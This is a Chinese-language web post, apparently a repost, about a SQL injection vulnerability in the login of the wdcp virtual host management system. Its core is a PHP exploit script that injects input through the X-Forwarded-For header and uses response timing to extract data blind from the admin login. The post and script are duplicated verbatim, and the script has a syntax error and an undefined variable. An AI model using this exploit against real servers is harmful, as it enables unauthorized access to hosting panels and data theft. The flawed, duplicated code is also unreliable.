wdcp虚拟主机管理系统注入漏洞
2014-05-24 04:21
176 查看
日期:2014-05-13 | 来源:伟大娃娃 |
作者:人生注入点 | 287 人围观
wdcp服务器/虚拟主机管理系统登陆框注入漏洞。
passwd字段存在注入风险,选择限制字符长度为30.我想应该有大牛能绕过!
下面给出由伟大娃娃发布的漏洞利用脚本
<?php
$id=$_GET["id"];
//$id2=$_GET["id2"];
$post_data = 'username=admin&passwd=bbbbbb\&Submit_login=aaaassss';
$url='http://xxx:8080/';
$starttime = time();
$ch = curl_init();
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL,$url);
//curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR: ,('.$id.'),char(65),1) #'));
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
ob_start();
curl_exec($ch);
$result = ob_get_contents() ;
ob_end_clean();
$endtime = time();
if($endtime-$starttime>=3){
exit($id." is ".chr($id2));
echo $result;
?>
作者:人生注入点 | 287 人围观
wdcp服务器/虚拟主机管理系统登陆框注入漏洞。
passwd字段存在注入风险,选择限制字符长度为30.我想应该有大牛能绕过!
下面给出由伟大娃娃发布的漏洞利用脚本
<?php
$id=$_GET["id"];
//$id2=$_GET["id2"];
$post_data = 'username=admin&passwd=bbbbbb\&Submit_login=aaaassss';
$url='http://xxx:8080/';
$starttime = time();
$ch = curl_init();
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL,$url);
//curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR: ,('.$id.'),char(65),1) #'));
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
ob_start();
curl_exec($ch);
$result = ob_get_contents() ;
ob_end_clean();
$endtime = time();
if($endtime-$starttime>=3){
exit($id." is ".chr($id2));
echo $result;
?>
相关文章推荐
- cookies注入漏洞
- OpenSSL再曝CCS注入漏洞-心伤未愈又成筛子
- 第四章:iOS应用漏洞利用 ——4.25 代码注入和DYLD_INSERT_LIBRARIES
- ACTCMS管理系统 注入漏洞
- 万网ORACLE注入漏洞详细手记
- “织梦”CMS注入高危漏洞情况
- 注入漏洞检测关键字
- ASP注入漏洞基础教程(二)
- IBM Security Appscan漏洞--链接注入(便于跨站请求伪造)
- WordPress Social Media Widget 插件HTML注入漏洞
- ECSHOP全版本注入漏洞(二次注入)
- SQL 注入天书 - ASP 注入漏洞全接触
- eWebEditor漏洞之sql注入漏洞
- Android WebView的Js对象注入漏洞解决方案
- Oracle也有注入漏洞
- 从163分站sql injection注入漏洞浅谈安全
- 关于IN方式的注入漏洞
- 风讯(FoosunCMS) SetNextOptions.asp注入漏洞利用
- SQL注入天书-ASP注入漏洞全接触 (入门篇)
- Android WebView的Js对象注入漏洞解决方案